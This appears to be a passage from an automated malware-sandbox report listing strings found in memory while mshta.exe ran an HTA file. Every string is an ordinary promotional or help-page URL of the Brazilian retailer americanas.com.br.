00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento_trocasedevolucoes?chave=dk_hm_ft_00_02_trocas
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-beleza?chave=dk_hm_bn_5_5_belezameta.largemeta.large.he
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-cameba?chave=dk_hm_bn_5_4_camebameta.largemeta.large.he
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-esporte?chave=dk_hm_bn_5_1_esportemeta.largemeta.large.
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-games?chave=dk_hm_bn_5_6_consolesmeta.largemeta.large.h
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-pcs?chave=dk_hm_bn_5_2_pcsmeta.largemeta.large.heightme
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-suplementos?chave=dk_hm_bn_5_8_suplementosmeta.largemet
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-ud?chave=dk_hm_bn_5_7_udmeta.largemeta.large.heightmeta
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/campanha-brinquedos?chave=dk_hm_dt_2_8_brinquedos
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/campanha-brinquedos?chave=dk_hm_dt_2_8_brinquedosmeta.largemet
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/cupom-de-desconto-americanas?chave=dk_hm_ats_2_6_cuponeriameta
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/cupom-de-desconto-americanas?chave=prf_hm_0_tt_9_cupom
Source: mshta.exe, 00000000.00000003.548553793.00000000079C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540451503.00000000079C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538072268.0000000007982000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/cupomf3P
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542912735.00000000079D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538072268.0000000007982000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540114671.00000000079CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/cuponeria?chave=dk_hm_ft_00_07_cuponeria
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-automotivo?chave=
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535609575.000000000533A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-clima?chave=
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-evento-brinq-esporte?chave=dk_hm_dt_2_9_brinquesporte
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-moveis?chave=dk_hm_dt_2_1_moveis
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-moveis?chave=dk_hm_dt_2_1_moveismeta.largemeta.large.
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-portateis?chave=dk_hm_dt_2_7_portateis
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-portateis?chave=dk_hm_dt_2_7_portateismeta.largemeta.
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535457179.0000000005336000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-telefonia?chave=dk_hm_dt_2_4_telefonia
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-telefonia?chave=dk_hm_dt_2_4_telefoniameta.largemeta.
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-tvs?chave=
Source: mshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/duvidas-marketplace?chave=footeracom_marketplace
Source: mshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/duvidas-marketplace?chave=footeracom_marketplace.e
Source: mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548706573.0000000005281000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/duvidasdiv770
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/electrolux-refrigerador-dez-21
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/eletrodom-campanha?chave=dk_hm_dt_2_2_edom
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/eletrodom-campanha?chave=dk_hm_dt_2_2_edommeta.largemeta.large
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/entregas?WT.mc_id=d_entrega_footer
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/guia-de-seguranca?chave=brd_hm_bt_0_footer_guiaseguranca
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/lasa-desconto-progressivo?tag=promo-leveeganhe-o2o-3&loja=amer
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/ofertasdatv?chave=dk_hm_ats_2_5_ofertasdatvmeta.smallmeta.smal
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/oreo?chave=pc_home_ads_oreo-wandinha_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/pepsico-elma-chips?chave=pm_tt_acom_biscoitos_pepsico-o2o_nov_
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/politica-de-privacidade?chave=dk_hm_ft_00_05_privacidade
